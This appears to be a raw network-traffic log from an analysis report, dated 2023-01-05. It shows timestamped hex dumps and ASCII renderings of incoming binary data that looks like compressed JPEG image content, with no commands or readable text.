                                                                                                                                                                                    2023-01-05 07:58:10 UTC5773INData Raw: 01 9f 10 11 39 62 67 33 30 cf 98 17 de 33 31 38 e2 2c 27 c6 73 31 eb 1f 81 f2 4c 22 0f 7e 7e 25 99 e4 14 08 04 ff 00 b3 31 f5 e7 e2 09 cb d6 67 c0 57 22 7e d3 05 c7 04 e7 c9 80 fe 47 f0 cf 8c e3 c6 61 30 78 c4 31 3e 3c b3 05 9c bd 06 18 c8 80 15 99 c8 57 04 63 11 73 01 06 1f 47 19 83 02 04 20 02 23 1c 78 06 12 20 38 87 d4 c4 e3 89 c8 08 4e 65 8c dc 9a b0 60 00 a9 25 62 b0 31 d7 d0 53 92 d8 86 c8 49 13 f6 34 fd be 85 80 c3 ee 21 e4 4f a8 cd 00 22 17 c0 e5 18 cc 66 07 80 e4 09 89 f1 33 e0 88 3c 81 19 7d 9f 70 fb 9f 10 7b 99 f1 9f 00 41 0f 9e 30 88 32 3f e1 66 e4 15 71 30 66 3c fb 25 a9 39 c4 74 24 aa e2 67 d1 60 27 31 e5 30 20 4c 82 0e 58 c0 61 32 b3 91 f8 e6 67 fe 01 0f 82 40 8c e0 46 c0 25 80 9f b0 4a d8 3c 77 c4 2e 16 07 e5 11 9b 21 84 65 0f 00 e3 1e be
                                                                                                                                                                                    Data Ascii: 9bg30318,'s1L"~~%1gW"~Ga0x1><WcsG #x 8Ne`%b1SI4!O"f3<}p{A02?fq0f<%9t$g`'10 LXa2g@F%J<w.!e
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5789INData Raw: a9 60 28 10 7a 60 71 92 08 c0 99 c4 e4 09 6a e3 08 a4 61 6c 0a 18 88 70 49 69 cf 33 f5 83 14 e2 7f d6 29 33 f6 4e 59 87 13 97 18 1f 11 9e 33 fb ff 00 b4 00 40 01 9f 13 86 67 1c 42 b3 8c 68 96 f1 8d 67 28 86 28 c4 e3 98 c8 20 38 9f f6 84 15 85 b1 14 c6 6c c2 60 20 4f 88 cd e0 b6 01 24 c1 ea 56 7d 72 02 22 82 57 d3 59 ee 13 88 49 60 a8 01 54 26 62 1f 51 5c f2 47 97 0c c5 6c c0 3d db ea 33 85 15 fb 8f f2 7d 46 b3 13 33 19 9c b3 07 c0 39 9c fc 66 03 e0 0c c3 0c f7 01 c4 0f 0b 45 fe 53 00 42 c6 1f 04 cc 4c c3 e3 33 33 94 e2 0c ad f8 82 d9 24 e6 1c 46 cc 07 10 92 41 69 ff da 00 08 01 01 00 01 05 00 be 81 c6 da b8 b6 a9 e7 5d b4 2b c6 ac 01 7d 18 9a 9b 1f ac eb ed 19 a9 78 31 2d f6 ae 09 d8 c3 0b e9 c0 d4 a4 a9 35 66 6c 68 ab 4b f5 a1 2c b2 b7 32 93 82 96 80 4f
                                                                                                                                                                                    Data Ascii: `(z`qjalpIi3)3NY3@gBhg(( 8l` O$V}r"WYI`T&bQ\Gl=3}F39fESBL33$FAi]+}x1-5flhK,2O
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5821INData Raw: 80 91 48 8c 30 4f f1 86 18 7d c0 33 02 f2 2c 85 08 f8 c6 20 00 82 00 8c f9 87 dc c4 e2 08 51 9f 18 e3 33 89 c4 4c e2 18 72 00 f7 00 84 ce 38 80 e0 9c 41 91 0f b2 61 3e 3e 26 20 f7 30 04 c0 c7 a0 60 13 fc d3 b4 51 ea d8 0d 3f 70 61 75 f8 1b 9d ab 03 d7 af f7 ee d6 4e 02 83 c4 07 e2 19 c6 2c a8 19 9c 14 71 1e d0 45 bf 26 ec 44 d8 c8 e7 99 fb 31 09 e5 1c 73 04 11 1f 5c 5b 37 3a e5 75 6d 66 ad ed 26 75 94 38 b1 75 ff 00 70 a3 a9 00 7f e6 11 3f a4 a2 7f 5b 8c 6e 4b 11 57 3f d6 0d 1f af 45 1b dd 25 77 4e d7 a0 4b 46 c7 4c d5 27 5d a2 ef 1f e9 c7 60 6e fd 5e dd 68 bd 75 95 59 d7 75 fa eb 4d 1d 6a 06 ae 95 c5 f4 23 2e de 88 64 72 52 0d 9c 44 d9 56 8f 81 01 c3 53 4a b1 ba 9c 8d 96 fd 42 8b d6 e8 8c 22 3f 35 d9 54 c6 b7 05 39 11 09 27 67 59 6c 6b 35 8e 0f 2a e1 b1
                                                                                                                                                                                    Data Ascii: H0O}3, Q3Lr8Aa>>& 0`Q?pauN,qE&D1s\[7:umf&u8up?[nKW?E%wNKFL']`n^huYuMj#.drRDVSJB"?5T9'gYlk5*
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5828INData Raw: 4b 6a e4 1a 8c 5a 16 c2 bd 61 b0 0e 82 e4 9f f9 36 2b af 56 b6 0a ba 3a e5 1d 2f eb 29 a8 80 26 95 6c 75 74 11 82 69 80 13 48 66 bd 70 a2 be 38 3c 72 78 e3 88 31 8c 24 e7 b2 dc a3 aa d6 fb 4f fb 37 b1 ed 0d b5 d7 58 50 5c 5b c1 45 97 0e 68 43 b5 c4 64 30 c7 2c 0e b7 b4 d9 eb 6d d8 ff 00 69 f7 37 2e d6 cd 97 d9 ed c8 ac 54 ae 4e 2c c1 2b 89 6e 41 16 62 02 40 ce 4a 9f 4c 31 3d 34 ff 00 a9 1f 20 e2 7c 9d 6d a7 d6 7e a7 ee 29 74 a9 d2 c4 65 f5 ff 00 58 7e 59 41 04 91 32 08 ff 00 b4 c9 13 21 49 00 42 a2 67 00 8c 42 b8 05 73 1c 42 0c 27 db 1c 06 6c 07 28 b1 fd 8e 46 1f 0a 27 ac 98 4e 3c 5d 40 66 b7 ab ad 87 d8 3a cd e5 a9 3e dd d8 69 d7 d2 a6 87 d8 2a fb 5d 8b f5 ad 6d 6f b9 59 6f 69 da 7d f3 6f b5 d8 d4 ec af dd b3 7b b6 fe d5 9b fd 3a 74 3a 1f 54 2b 7f 69 dc
                                                                                                                                                                                    Data Ascii: KjZa6+V:/)&lutiHfp8<rx1$O7XP\[EhCd0,mi7.TN,+nAb@JL1=4 |m~)teX~YA2!IBgBsB'l(F'N<]@f:>i*]moYoi}o{:t:T+i
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5860INData Raw: 6e d8 60 08 4d 1a 16 b6 df 65 af 5e 8e cf 6f a8 69 36 6c 35 03 21 aa b5 87 81 ee 2a 31 0d 53 57 33 ef 99 03 59 f8 35 60 e7 70 97 3a ce cf d6 eb 6c db 6c ad af ad ba 54 35 57 bb b5 ab ad 67 73 dc ff 00 61 ab 4a c3 eb 76 1a d4 26 a5 ef 40 3b 41 ae d3 fd 3a 8e f4 2e c0 d1 d4 e4 db d5 70 6e d6 d4 b1 36 ca 58 db 6b 4d 64 ef aa c7 db 7b 93 ab ea ef d8 ba 81 c1 b6 ef b7 5e 75 b4 aa 53 da 7d a4 54 bd df da ee 02 ff 00 b1 b6 d0 d0 de da a1 b7 ea bf 2c d7 f1 56 43 28 b0 7e be 9e ea 35 af d8 2b b3 ba c6 a5 d7 5d a6 0b 5d dc 01 04 cf e2 16 dd 16 41 a7 fa aa 3a 3d d2 e8 58 f7 87 7e cf fa 45 b8 a0 06 c1 82 ec 42 d4 5a 14 e1 1b dc f7 2a a8 30 fd 4a ab 71 2c aa d9 2c 91 a7 f9 f6 25 36 f0 7b 2c a8 d6 5f 9a 91 11 19 0d 57 9b 25 fc 43 53 a4 6d 56 a4 82 eb c1 35 b7 5e 94 a3
                                                                                                                                                                                    Data Ascii: n`Me^oi6l5!*1SW3Y5`p:llT5WgsaJv&@;A:.pn6XkMd{^uS}T,VC(~5+]]A:=X~EBZ*0Jq,,%6{,_W%CSmV5^
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5892INData Raw: 7e e6 9a 4d 70 ca f5 3b 1b aa e0 d2 c2 f5 b5 5b 0c 1a bd 7b 6d a1 b5 f0 1a 96 a0 6c 05 7a eb b4 a5 7b 3d 7e d5 fa 14 f5 fb 36 25 44 54 77 aa 6b 1d 74 8e 14 5e 92 fb 0d 87 a3 fb 1e df 4b 66 af 65 bb 66 c7 60 f7 69 5b d0 76 da 9a ce bd dd 54 dd b8 c9 c9 b9 34 c6 25 4b 93 6d 2a a6 8b 02 36 f5 23 9a 5c a9 65 96 f2 67 50 60 c0 0c dc 89 5c 14 1c a7 dd bb 7b bb 5d 9e ab eb bb bd 81 df df d1 13 47 63 75 12 ff 00 a2 5e 9d 6f d4 ba 46 d9 aa f2 dc f4 36 42 3b 59 c2 be af 61 9d b6 0b 33 0a 4b 06 e2 a9 5e c5 81 36 11 ec 16 b2 0a f6 b6 3f ae ba 34 6b db 08 e2 fd 75 55 f5 92 d5 da ec ec 1d 5d 8d 19 38 1b 2d 56 ac fc f1 13 5f 70 d3 58 7c c0 79 4e 61 40 66 53 63 1c 05 13 86 4d 1d 7a 59 57 6b d4 df d5 db ad 41 20 a5 bd 4d fd 86 e1 da da a6 8f db 45 bb 2d 82 d9 8a c3 2f 60
                                                                                                                                                                                    Data Ascii: ~Mp;[{mlz{=~6%DTwkt^Kfef`i[vT4%Km*6#\egP`\{]Gcu^oF6B;Ya3K^6?4kuU]8-V_pX|yNa@fScMzYWkA ME-/`
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5916INData Raw: 54 ec 04 75 63 68 d3 b4 54 cb 69 b0 74 7a 8b b7 56 de d3 75 f6 e8 93 6f 59 d7 db fd a9 a7 be 95 dd 57 6d af 5e cd ae 7b 5d ae d9 6a ea 2b d1 e9 35 77 f5 4f 5f 5d b4 74 81 e9 d8 6d 13 9e 9b eb 3d 5a a7 da 7b 5d 7e ce 8d 9d 24 a7 7b b8 fe 97 5e 6f 6a ee 0b f5 53 71 dd d3 b7 58 e7 10 37 28 c3 d1 1e e6 0f 81 f2 ca 56 05 24 b5 4c 05 6a 32 54 01 fa 73 2c fe 30 7c 88 54 34 a2 c3 ae 68 be aa ce df 69 5d d4 b2 86 96 02 91 14 b4 23 13 3e cc 0a 0c a9 82 ca ec 24 e8 b8 a9 6c b0 66 a0 36 2b 57 0d 2e 0a 1b d4 17 60 fd 69 1b bc d9 d8 ed 68 ba ad 64 61 6d b7 68 bc bb 77 9d 5d 0f d6 9e eb 1d b5 b4 88 d6 d8 ec dd 7e b9 ad fa b5 f5 f5 6c a7 b2 4e bf b1 9b 3d 42 e5 75 94 1e bf a8 66 1a e3 ad d6 a7 b4 d5 bb 62 c1 53 c6 a9 96 0a 1e 3a b5 70 81 9c 62 75 bd 5d db f6 7d 6f ab eb
                                                                                                                                                                                    Data Ascii: TuchTitzVuoYWm^{]j+5wO_]tm=Z{]~${^ojSqX7(V$Lj2Ts,0|T4hi]#>$lf6+W.`ihdamhw]~lN=BufbS:pbu]}o
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5948INData Raw: 5c 29 d6 a5 bb 4e d4 5e c6 d6 25 42 99 bb 85 20 08 cd e8 cc f8 d3 ad 89 da 0c 85 d4 98 57 10 45 71 16 d1 07 da 74 b4 c6 cf 7a db db 1b 1d c6 ca b6 e3 5b 65 7d 65 7b 35 be de c1 56 aa 9d 9b 17 b0 a7 63 af 5e 87 47 5b 76 57 d4 d7 b3 53 76 74 be df 5b ae 4e c5 1c c6 de be d6 b9 d3 d9 ea ac ea ec a4 2d d6 27 61 b8 95 6d d3 bb b3 d7 6c 75 c9 b0 bb 97 ee 5b bb de 77 fd bb 59 d5 6c ed 1a 75 3f d8 69 9f b2 6a f5 d4 cb 7b ed 4b ba 9f a2 f7 da 9d 66 df 5f f6 24 6d 5d cf a0 76 74 f4 da 1b 9b 36 5b d9 76 55 74 e3 b0 d7 bb 5f ac bb 6b 57 ec 74 f4 bd 65 bd d7 63 f6 4f b2 a7 42 3e cb d7 68 74 8f fb 2e ab 66 96 6d 8d ee cf e9 d5 f5 5d 4f 63 db 6e 6f d1 7e b5 fa da 7f fb 9b 5a 3a 69 bb b7 d0 d7 aa 86 ad bb 2b 6d cb 3e eb d1 f5 9d 65 a5 5e 96 ea 41 2b 55 97 6b e9 6b 58 5a
                                                                                                                                                                                    Data Ascii: \)N^%B WEqtz[e}e{5Vc^G[vWSvt[N-'amlu[wYlu?ij{Kf_$m]vt6[vUt_kWtecOB>ht.fm]Ocno~Z:i+m>e^A+UkkXZ
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5971INData Raw: 8a 88 a3 f6 b6 b7 55 6d f6 ef 75 0f ac 7f ae aa 6f dd 7b ec eb 36 15 ee de df a5 b5 fb 4d dd 5b 74 2d fb 7f 61 d8 53 69 d7 4d 5e a3 bf de fd 9d de b6 da 1f ac 7e 91 6f 41 da 56 83 bb d6 5d bd aa 57 99 d2 d2 3d 75 9b 1d b1 d9 d3 bf 58 a1 08 42 d3 6d 68 97 59 55 55 69 f7 7a a9 b5 b9 da ed fd c6 51 aa 6c d8 d2 d7 d4 be d7 6d 30 3f 71 b2 fe d7 92 9a fa f7 eb 50 b6 a8 b7 a9 e9 6f e5 f4 dd 0b 11 b6 6a d9 dd bc eb 69 f5 7a bd c1 bb 62 8d 1e 92 c5 a3 53 5b fa b4 e9 f7 2f b4 28 ed 2f a5 3b 87 a2 dd 5a 3b fd 5d 76 b3 7c 6e d7 a9 ad 52 81 5d 96 35 6b 6b bd dd d5 8b 5d 3d 96 f8 8f 6b ed 3f 6b dd 69 d9 aa dd 86 bf 5d 45 2c a1 ca d7 ae 3b 1f b0 50 ad b1 bf ae c3 47 6b 52 e7 d4 e9 ed e5 65 55 e9 2f 55 4e f9 aa fd ae c3 6e f7 eb ad 2d dc 75 db 1a e0 0f ef 1d 6d 8d d2 bb
                                                                                                                                                                                    Data Ascii: Umuo{6M[t-aSiM^~oAV]W=uXBmhYUUizQlm0?qPojizbS[/(/;Z;]v|nR]5kk]=k?ki]E,;PGkReU/UNn-um
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5979INData Raw: a0 e6 9c bf 49 b8 71 bf 12 f0 e3 2a 4b c2 2b 4b 2b 69 46 fd 14 58 b1 65 62 8b cd c4 96 50 a7 43 2f 5d 17 a6 87 25 6c 1e cd 77 0b 0b 43 d2 c9 f0 e1 9d 17 85 27 4c 9b ac 99 e2 81 cc 91 f1 2b 71 59 51 88 88 f3 7d f8 88 8e 1a d2 c7 85 1f ed c2 82 c5 ee 23 16 4f 12 2f 0e 4f a7 44 7c f5 59 7a 2b 42 d8 d6 2c 63 9c 2d 95 f6 45 1e ad 8b c4 ad 17 ad ec ab 45 c7 94 8e 08 a1 c3 e7 1c f9 8b 14 43 1c c0 85 c2 59 11 14 7c 71 63 8a 28 af 31 72 7c 07 2f f5 48 fc c5 0c 73 e0 78 9c d1 d2 44 cf 57 10 e3 79 d5 8d fd 45 9d 3b 1b 28 53 9b 10 a3 16 2f 02 f0 f4 2c a1 08 b2 c6 56 c6 79 b0 c6 3d fb 3a d3 45 9b c8 98 c3 37 95 a2 f2 e0 5a 6f 43 db 5e 39 d7 57 08 f8 8f a4 86 4c c9 1f f8 b8 3a 79 fc dc 5e d3 97 cd 1c 3e a2 26 23 a7 8b f6 9e d1 c6 28 5c 7d 51 27 49 d3 d2 58 d7 0f f8 61
                                                                                                                                                                                    Data Ascii: Iq*K+K+iFXebPC/]%lwC'L+qYQ}#O/OD|Yz+B,c-EECY|qc(1r|/HsxDWyE;(S/,Vy=:E7ZoC^9WL:y^>&#(\}Q'IXa
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6011INData Raw: 52 2c 45 ef 52 78 91 f6 d7 b3 f4 15 6e 3a 8a e3 d9 34 46 91 fa ab b6 6d 50 05 a8 83 78 13 a5 41 89 9f d7 5b 49 d0 45 46 9f a6 b5 b5 b4 a8 f2 9d 68 9e 15 00 f0 bf 3f b6 84 68 6a 26 79 54 73 af e1 51 c6 af c7 ed fd 0d 5f ea a0 27 b0 ff 00 c2 84 80 41 a8 8e ca bc 4f 65 49 a3 7f 65 eb f5 4d 41 30 38 54 da ff 00 55 0e 22 a0 7d 9c ea 44 1b 54 12 26 b8 de d5 13 02 38 50 00 6b 57 3c 68 40 d6 bb c2 b5 20 8b 8e 55 33 03 d9 51 37 15 3a 1e da 88 9f eb a8 98 9b 7b 2a fa 5e 2b bd fd 75 6a e7 db cf fa aa 38 0e ca fd 73 46 4f 6d 5f 9c 57 6e 97 a1 cc 7e ca 10 35 92 79 01 40 f1 89 f6 54 81 37 9b 55 f4 a3 33 ce ad 6a 33 f5 0a dc c7 5d 6a 17 59 ab 00 4f ea a8 12 5b f7 fd 1a 4d 12 06 82 af 52 74 a8 36 15 34 27 ed 1c e8 91 af 1f a2 dc ea 08 81 40 f0 d6 a4 0f ae bf 75 45 84 73
                                                                                                                                                                                    Data Ascii: R,ERxn:4FmPxA[IEFh?hj&yTsQ_'AOeIeMA08TU"}DT&8PkW<h@ U3Q7:{*^+uj8sFOm_Wn~5y@T7U3j3]jYO[MRt64'@uEs
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6043INData Raw: ca 07 5b 4d cd 11 37 9b 8e 3d b4 44 f7 66 c6 3f 75 6e e1 a5 bf 7d 47 84 4d fd 95 62 3d 93 c0 f6 d4 27 2e 22 89 16 60 62 2b bd a8 bd 16 5e ec d6 d7 b4 50 83 7a 12 6d c6 a4 c0 ed 03 5a 00 7d 44 eb 5b 5b ec 3a fb 2b 70 d0 0e f7 6d bf 75 69 6a 88 1a 6a 7f 5d 02 08 93 63 37 a0 83 41 71 1c 39 d6 d0 24 8e 07 f4 e3 5b 80 82 68 83 a1 10 2a e0 13 d9 fa aa c6 4e b3 fc 68 fe 9f 65 0e de 67 f4 d2 89 d0 eb 3c ea 24 8f 6d 69 13 fb 45 6d 36 81 22 88 8b 01 a5 12 a0 8b 5c d4 8d 0d 40 d4 71 ad b3 4a e3 87 ef a8 22 08 30 63 8c 54 cd cf ea 07 b2 b4 d3 f8 54 4f d7 40 c5 ea 08 a8 36 33 5d fb 70 ff 00 db 46 35 13 44 8b d4 b9 d2 81 e2 7f 5d 12 2c 38 54 f2 d2 ad a5 15 88 33 a5 13 c2 b4 b5 12 be 30 34 98 9e 55 ce 26 a7 8d 72 22 80 fd 7d b5 27 43 50 34 ed e1 40 2e 97 bd 4f 13 44 54
                                                                                                                                                                                    Data Ascii: [M7=Df?un}GMb='."`b+^PzmZ}D[[:+pmuijj]c7Aq9$[h*Nheg<$miEm6"\@qJ"0cTTO@63]pF5D],8T304U&r"}'CP4@.ODT
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6166INData Raw: 75 60 60 9d 38 ff 00 2d 6e 5b 98 bc 70 a2 a2 2f 73 fc 05 6e c6 21 49 99 ed a0 d1 0c 06 9c 26 bb 84 85 be bd 95 b5 ac b1 04 8e 55 00 4a eb ae 95 b6 09 88 fa ab bf 71 c0 69 ed bd 6c 61 3c bf aa 81 93 1c 2f c6 a4 8d 75 8a 2a 07 78 f3 36 a3 cf 81 fa eb 69 17 53 7b 55 c4 f1 ae 63 ec 07 fa ea 53 4d 2f 6a d0 8b 6a 79 4d 40 6e ec 45 44 ee 02 e4 f3 b5 58 df 89 a0 0f db 41 db 4e dd 22 8e fd 2f 63 c2 ae 6f c3 b4 50 df 10 0d 41 51 69 9e 11 ee d1 e7 71 41 86 80 cc 8e df 15 13 a5 b8 5e dc 6b 78 e5 14 01 30 47 1f d3 cb 5b 48 04 10 40 ad f1 5a dc 18 bf ec a0 00 d0 e8 68 c6 b5 cf 8e bc a8 8b 77 b8 7e ea f6 89 93 c7 ea a2 45 8d ea 32 41 5d 20 ff 00 9a a0 80 0c f0 e5 fc 68 96 3d d3 ca ff 00 65 6e 61 a5 a6 68 7a 26 56 c6 fc 0d 4e 2b 30 89 fd 3d ea fc 4b 30 ae e8 9a 80 3e da
                                                                                                                                                                                    Data Ascii: u``8-n[p/sn!I&UJqila</u*x6iS{UcSM/jjyM@nEDXAN"/coPAQiqA^kx0G[H@Zhw~E2A] h=enahz&VN+0=K0>
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6198INData Raw: bb 21 5b a8 c8 7d 4f ca e1 1e 15 c3 d3 61 f1 3d 27 59 d0 f4 d9 0b e3 c4 f9 ba 87 00 05 6c ae 7d 2e 93 a4 e9 96 f3 ff 00 53 25 75 38 c7 50 d8 0e 07 38 5f 19 76 50 d2 08 26 56 cd e8 64 f1 63 ac 5d 37 cc 43 0e af a6 66 c3 93 74 df d3 30 8c 0f 99 59 63 bd 46 24 de 67 4b fb 28 45 b5 d0 eb c6 b7 76 d8 c7 13 c3 ff 00 55 4b 5c 68 04 f1 a2 bc 07 2b 81 3d b4 de 9b a3 ec 25 5b 69 06 1b e2 8a b8 df c2 27 5e ca 3d 0f 53 85 db 1e 32 15 b2 a1 f0 bf 9d 36 79 95 3c d4 bd 5f 43 91 73 60 37 dc a6 6f f1 0d 50 fc 35 cb 5f 6d 19 20 47 bc 60 0f 89 a9 f0 f5 3d 4a 61 75 92 37 11 0c 07 26 49 ab 75 aa 58 18 3d d6 80 4d a7 4f 0f c5 4a d8 59 72 63 6e f0 60 7b a4 79 5c 35 15 89 fd 95 e9 b0 97 51 de 50 74 9e 14 48 52 44 70 d7 f5 d1 e9 15 d4 e7 17 d8 08 dd 1e f5 4b fe cd 2b 76 3b c1 b4
                                                                                                                                                                                    Data Ascii: ![}Oa='Yl}.S%u8P8_vP&Vdc]7Cft0YcF$gK(EvUK\h+=%[i'^=S26y<_Cs`7oP5_m G`=Jau7&IuX=MOJYrcn`{y\5QPtHRDpK+v;
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6214INData Raw: f6 51 08 46 e3 a9 e3 5b 9b d9 5b 40 b1 a9 1a d5 e8 95 d0 51 1c b8 d1 20 4c 6b 48 1c c6 46 13 15 b4 77 94 d4 01 11 53 50 6b 19 c6 3d 4c cc 01 dd c1 7e aa 67 cd 93 71 37 01 78 1e ca 20 08 1f b6 ae 64 b1 88 d3 ea a0 0d 86 86 2b d9 53 ce bf 30 c6 17 4e d3 47 69 2b c8 70 af 4c 0b 73 a5 39 6c 59 64 76 8a 81 ad 04 61 30 6a 0a 9a 8c ca 4a 01 34 08 52 41 fd f4 ad b7 b9 20 fb 40 a1 d5 6d 58 92 61 8f ee a2 48 df 91 e0 80 0c 7d 55 36 5d b4 70 b9 36 e3 ec a8 55 90 29 0b 08 42 7e aa b3 11 7b 8e 75 28 48 bc 44 f0 a2 a9 c6 d5 bc 01 24 c4 9a 5c aa d2 da b1 e1 5b d6 ed fa 70 a0 d9 81 d8 6c 2a 30 01 b7 1c 33 16 20 00 29 8f 48 80 92 b0 5e 41 93 1d eb f8 a9 1c b2 0e 3b 47 3f 8a 8e f1 78 82 dc 29 90 83 b1 79 5a 4f 2a f5 31 0d ea 75 b5 c1 e7 5d d6 de b7 91 a1 5a f5 1a 4e e3 c0
                                                                                                                                                                                    Data Ascii: QF[[@Q LkHFwSPk=L~gq7x d+S0NGi+pLs9lYdva0jJ4RA @mXaH}U6]p6U)B~{u(HD$\[pl*03 )H^A;G?x)yZO*1u]ZN
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6262INData Raw: 58 82 c5 8c 59 0a d7 e5 86 3c 63 24 94 24 e9 1c 37 47 77 f9 a9 72 29 0b 96 46 d2 bd e0 63 95 32 75 0e 19 9c 77 a0 0b 7b bb 3f cd 40 e2 72 35 0a 07 11 34 d9 1f fd 41 ce 88 2f 16 24 4d 18 b0 ec a6 1d 0a 7a 9e 98 05 ee 06 d9 3b 41 6d dd b4 3a 77 85 33 b7 71 f0 ff 00 6a 8e 12 25 86 b1 a7 d4 dc 69 95 86 e6 78 8b d8 7d e1 5b 8a ed 06 e3 9f fc 29 59 17 c0 dd e6 1d ba 50 c1 32 c4 ea 2f 5b 72 31 65 02 20 da 28 33 b0 08 b7 13 c6 38 57 aa 6c b4 15 0d bf 4b d5 9b 73 f1 fe aa 9e 55 6b 55 ad 5f 97 52 46 32 64 c5 a4 f6 d0 0c 65 47 0a 08 4e dc 42 f7 16 5a da 16 48 90 5a 35 a3 b4 15 ab dc 9a 56 6b 84 50 06 ee 43 85 7a 8e 77 0e 20 88 34 0b c9 06 76 c9 b1 b7 8a 8b 39 8d ba 5e df cb 45 a6 c6 d4 ad 90 92 a4 c7 db 45 b1 16 5d bc eb d4 17 bd 41 10 27 51 43 14 00 04 09 f6 76 d0
                                                                                                                                                                                    Data Ascii: XY<c$$7Gwr)Fc2uw{?@r54A/$Mz;Am:w3qj%ix}[)YP2/[r1e (38WlKsUkU_RF2deGNBZHZ5VkPCzw 4v9^EE]A'QCv
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6341INData Raw: 49 b8 e5 6e 9f a7 c3 97 36 c0 25 1b 28 f5 13 0d fc 4c aa d4 19 91 db 09 d4 11 b5 a3 4f b6 b7 19 01 71 ef 07 89 04 4a ac 73 a1 93 a7 70 c5 57 71 9d 05 b4 bd 0e 9f 2a 85 c8 9c 46 a6 93 1b 26 d2 83 bc d3 33 fc 29 5c 62 0a f0 2f ba 26 f6 66 b7 f7 69 97 e5 fb 53 21 46 dc d9 42 b6 be 3d 9b b8 32 f8 69 13 3a 06 c2 a7 40 62 07 b6 93 f0 7d 62 5d 18 b3 58 aa 8f 1a ad f6 c3 cf 9a 83 b9 56 2e 1c ac 80 ac b2 77 10 db 7b bf 75 ab 1f 52 98 d4 f4 f0 77 6e 6e 02 de da 32 e1 8e 30 07 76 f3 1a 69 50 a6 41 3a 91 73 34 c4 9d 2b f1 09 2b fb 29 b2 e0 04 e2 30 01 3c 0d 7e 36 60 85 50 c1 3a 4f 04 b5 11 8d b6 ee b1 3c 0d 63 e9 33 65 2d 83 10 85 4f 2d 0e 83 16 35 52 cc 59 df 89 f7 53 ee 2d 7a 9b a3 68 99 07 8f 2a c9 9f ac c0 bd 4a ba 95 28 d6 d4 77 5b 77 63 52 c1 8b 40 b4 09 a4 f9
                                                                                                                                                                                    Data Ascii: In6%(LOqJspWq*F&3)\b/&fiS!FB=2i:@b}b]XV.w{uRwnn20viPA:s4++)0<~6`P:O<c3e-O-5RYS-zh*J(w[wcR@
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6373INData Raw: 52 e6 05 1f 6d ab 7a f8 66 27 b6 88 d5 b5 fa a8 1b c5 4f 11 ce a1 a0 11 7d 2b 7e 42 4b 37 13 72 6b 6b da 34 f6 d3 02 03 21 e7 c3 b4 52 be 2c 90 ec 48 75 7b 94 1e fa c7 96 ba bc 40 26 4c 4b dc 19 0e 85 90 ef fc 31 a8 67 ff 00 0d 1e a3 e6 0a ca 2c 55 1a 46 e0 7b 7c b1 59 47 47 e9 ae 1c 67 7b 92 3f 08 85 b2 85 4f 37 f3 52 e2 db 1f 91 0a b3 10 08 27 7e 3e ea ff 00 6a 95 32 64 f5 99 71 ee 7d 01 72 d1 b9 17 5d 28 9c 89 e8 e0 c5 07 1e 34 16 24 ea ee c7 53 5b b2 20 ee b6 e9 9f d5 47 16 6c bb 1a 40 40 c4 6d 12 7b db 8f bb 45 31 ed 2d 8a 4b 19 1b 41 e6 4f 15 ac 9d 7b 64 c6 98 15 a3 d4 22 cc fe e6 20 b4 fd 1e 55 c6 c5 9d 5f 7a cc 8d a3 6e d5 3e eb 71 a2 56 c0 98 15 8f a3 ce e3 0a 64 70 8c ec 40 0a 38 bc b7 2a 6c b8 f2 0c 98 31 97 5c 61 98 48 02 db ca ff 00 86 88 c1
                                                                                                                                                                                    Data Ascii: Rmzf'O}+~BK7rkk4!R,Hu{@&LK1g,UF{|YGGg{?O7R'~>j2dq}r](4$S[ Gl@@m{E1-KAO{d" U_zn>qVdp@8*l1\aH
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6381INData Raw: 65 38 11 96 08 0d e6 75 61 e6 f2 d0 55 c6 46 22 ab 8d 98 dd a4 79 93 e2 63 58 f1 21 db 9f 2e d4 74 03 6a a9 d3 77 d4 8b df a4 66 5f cd f5 ea 76 63 66 13 89 76 9e e9 3f f5 f2 2f bb e0 5a cc fd 6b 1c dd 6e 69 de 48 e4 3b df d9 1e 55 f0 d4 66 24 e5 70 3b a2 c5 4c fe be ed 4e 0c 33 91 54 83 ea 31 60 f3 ee a8 f0 ed 5a cd d2 f4 78 d4 64 ea 80 07 21 50 c5 54 79 56 7c 28 7c d4 7a 4c ce 42 11 bd d9 8e 8e 07 7a 37 70 ae ee 41 bb cb b7 53 3d be ca 4e 95 32 1e a0 15 9d cc 60 62 68 dc 7b fa 3f dc a3 b8 1d ca 56 2d a8 22 c6 81 d4 1b f6 d7 70 58 71 e5 47 2e 45 dc 16 c0 c4 89 fd 96 a7 45 83 87 30 57 8b 77 49 e5 ee d0 5c 93 3d b5 de ab 56 e1 e3 a8 e7 5b 56 e6 a4 50 cb 91 3d 40 24 15 3a 47 f1 a5 c1 85 99 70 ab fa 8a 9a 80 d1 b7 78 f8 aa 1f bc 1f 56 6b c7 dd ec a1 e9 9b 4c
                                                                                                                                                                                    Data Ascii: e8uaUF"ycX!.tjwf_vcfv?/ZkniH;Uf$p;LN3T1`Zxd!PTyV|(|zLBz7pAS=N2`bh{?V-"pXqG.EE0WwI\=V[VP=@$:GpxVkL
